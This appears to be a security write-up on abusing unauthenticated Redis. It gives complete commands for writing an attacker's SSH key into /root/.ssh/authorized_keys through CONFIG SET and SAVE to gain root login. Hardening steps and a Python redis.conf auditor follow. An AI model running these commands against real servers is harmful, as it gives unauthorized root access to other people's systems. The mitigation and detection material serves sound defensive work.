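This relies on the fact that Redis persistence writes a file to disk, and that Redis lets you choose where that file is written and what it is called. If the Redis instance happens to hold only one key, that key is an SSH public key, and you set the persistence file name to "authorized_keys" and its directory to "/root/.ssh/", then whoever holds the matching private key can log in as root without a password.
1. Generate the key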
[root@saltstack-node2~]# (echo -e "\n\n";cat .ssh/id_rsa.pub;echo "\n\n") >/tmp/foo.txt
[root@saltstack-node2~]# cat /tmp/foo.txt
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0rfmYdQvgw/fmrKMj2nRV5FMucTAlv+J49Yu2MRsC9v0ORkesquGShvM/KuIM0P4yMS/l5/N/AzC3X76QJm3XeckuZdpo7KhZGuWGb76n4LrDf1UekagYW7dmW9f2WXnRrxnhl64N3DOeH9A2mD/mRrNrrJ+yyVUjbG9fM+FzOU8mYf7rqvLzqO2ppHYpPj9T5sR8E4bZpYBCQT9JXlA1N3y48LUGUqE5AuUKYEc6wyJCvPxaPWa8Ss03+zaVyF7ly+dje+3sDF1n8DvwveLaXV8BPfGB5bVG4kEtIhiWmWR+ITnLyzLzle2292+BtgfOrKOopk8TlBIhjVzl1LOJQ== root@xxx.example.com
\n\n
2. Flush Redis
127.0.0.1:6379> FLUSHALL
OK
3. Write a key
[root@saltstack-node2~]# cat /tmp/foo.txt |redis-cli -x set pwn
OK
4. Modify the configuration of the known Redis instance
127.0.0.1:6379> CONFIG set dir /root/.ssh
OK
127.0.0.1:6379> config set dbfilename "authorized_keys"
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379> exit
5. Login is now possible
[root@saltstack-node2~]# ssh 192.168.81.129
The authenticity of host '192.168.81.129 (192.168.81.129)' can't be established.
RSA key fingerprint is 7d:c4:f0:37:1e:ba:da:90:56:8b:fa:ee:df:d0:3f:22.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.81.129' (RSA) to the list of known hosts.
Last login: Wed Nov 11 03:18:23 2015 from 192.168.81.1
[root@saltstack-node2~]#
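Preventive measures:
1. Do not start Redis as root or as any other account that can log in (run it with low privileges).
2. Change the configuration to require password authentication: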
requirepass password
3. Bind to an internal IP address so the service is not reachable from outside:
bind 192.168.0.5
4. Remove the Redis commands that can be used to compromise the system:
rename-command FLUSHALL ""
rename-command FLUSHDB ""
rename-command CONFIG ""
rename-command EVAL ""
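
The following Python is an added example, not part of the original post: it audits redis.conf text against the preventive measures above and recognises an authorized_keys file that is actually a Redis RDB dump (RDB files begin with the bytes "REDIS" followed by a four-digit version). The function names and the two sample configurations are assumptions constructed for illustration.

```python
import ipaddress
import shlex

RISKY = ("FLUSHALL", "FLUSHDB", "CONFIG", "EVAL")  # commands the post disables
# Constructed sample configurations (not taken from a real host).
WEAK = "bind 0.0.0.0\nport 6379\ndir /var/lib/redis\n"
HARDENED = ('bind 192.168.0.5\nrequirepass password\n'
            'rename-command FLUSHALL ""\nrename-command FLUSHDB ""\n'
            'rename-command CONFIG ""\nrename-command EVAL ""\n')

def parse_conf(text):
    """Return (directive, args) pairs from redis.conf-style text."""
    pairs = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            parts = shlex.split(line)
            pairs.append((parts[0].lower(), parts[1:]))
    return pairs

def exposed(ip):
    """True if a bind value is a wildcard or a publicly routable address."""
    value = ip.lstrip("-")  # newer Redis versions allow a '-' prefix on bind values
    if value == "*":
        return True
    try:
        addr = ipaddress.ip_address(value)
    except ValueError:
        return True  # unparsable value: flag it for manual review
    return addr.is_unspecified or addr.is_global

def audit_conf(text):
    """List the settings that leave the authorized_keys overwrite possible."""
    conf = parse_conf(text)
    findings = []
    if not any(d == "requirepass" and a and a[0] for d, a in conf):
        findings.append("no requirepass: clients are unauthenticated")
    binds = [ip for d, a in conf if d == "bind" for ip in a]
    if not binds:
        findings.append("no bind directive: Redis may listen on all interfaces")
    findings += [f"bind {ip}: reachable beyond the internal network"
                 for ip in binds if exposed(ip)]
    renamed = {a[0].upper() for d, a in conf if d == "rename-command" and len(a) == 2}
    findings += [f"{c} not renamed or disabled" for c in RISKY if c not in renamed]
    return findings

def is_rdb_dump(data):
    """True if the bytes start with the RDB magic, as a file written by SAVE does."""
    return data[:5] == b"REDIS" and data[5:9].isdigit()
```

Run `audit_conf` over the deployed redis.conf and `is_rdb_dump` over the first bytes of each account's authorized_keys; the process account (measure 1) is not visible in redis.conf and has to be checked separately.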